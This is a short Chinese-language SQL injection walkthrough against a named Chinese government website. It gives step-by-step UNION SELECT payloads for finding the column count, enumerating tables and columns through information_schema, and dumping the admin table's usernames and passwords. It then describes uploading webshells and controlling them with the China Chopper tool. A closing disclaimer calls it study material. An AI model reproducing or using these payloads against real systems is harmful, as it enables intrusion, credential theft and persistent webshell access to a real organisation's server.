步驟一:
利用阿D瀏覽器通過https://s.bt.gg? 注入關鍵字掃描發現注入點:
http://www.rqyl.gov.cn/*****.php?ID=153 用啊D跑不出賬號密碼?
步驟二:
手工注入http://www.rqyl.gov.cn/*****.php?ID=153 and 1=1 、and1=2出錯
猜字段http://www.rqyl.gov.cn/*****.php?ID=153?? order by 17
查詢錯段?
www.rqyl.gov.cn/*****.php?ID=-153 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
version() 查詢數據庫版本
user() 查詢當前用戶
database()查看數據庫名
@@version_compile_os 查看服務器系統
www.rqyl.gov.cn/*****.php?ID=-153 UNION SELECT 1,user(),3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17
爆出數據庫中所有表:
www.rqyl.gov.cn/*****.php?ID=-153 ?UNION SELECT 1, group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17? ?
from information_schema.tables where table_schema=0x67313838343638---數據庫轉為十六進制
爆出admin里面的內容:
www.rqyl.gov.cn/*****.php?ID=-153? UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
from information_schema.columns where table_name =0x61646D696E
www.rqyl.gov.cn/*****.php?ID=-153? UNION SELECT 1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17?? from admin
用工具找后臺登陸? 上傳小馬 找到小馬的上傳地址? 用菜刀連接
在存放網頁文件php 處新建文件? 把大馬考進來
?
聲明:本文章僅供學習參考,不得對目標站點進行攻擊,否則后果自負,與本人無關!